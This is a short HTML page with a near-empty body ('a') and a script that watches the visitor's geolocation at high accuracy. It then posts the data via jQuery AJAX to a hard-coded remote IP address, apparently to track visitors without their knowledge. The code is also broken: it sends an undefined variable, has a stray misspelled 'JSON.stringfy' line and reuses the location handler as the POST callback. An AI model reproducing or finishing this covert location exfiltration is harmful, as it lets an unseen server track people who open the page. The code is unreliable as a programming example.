<HTML>
<head>
<script src="http://code.jquery.com/jquery-2.1.4.min.js"></script>

</head>
<body>
a
</body>
<script>
var options = {
  enableHighAccuracy: true,
  timeout: 5000,
  maximumAge: 0
};

function post(data){
	$.ajax({
  type: "POST",
  url: "http://59.106.210.146:4567",
  data: data,
  success: success
});

JSON.stringfy	
	
}

function success(pos) {
  var crd = pos.coords;
  
  console.log('Your current position is:');
  console.log('Latitude : ' + crd);
  console.log('Longitude: ' + crd.longitude);
  console.log('More or less ' + crd.accuracy + ' meters.');
  document.write(crd.latitude);
  document.write(crd.longitude);
  post(data);
  
};

function error(err) {
  console.warn('ERROR(' + err.code + '): ' + err.message);
};

navigator.geolocation.watchPosition(success, error, options);
</script>

</html>
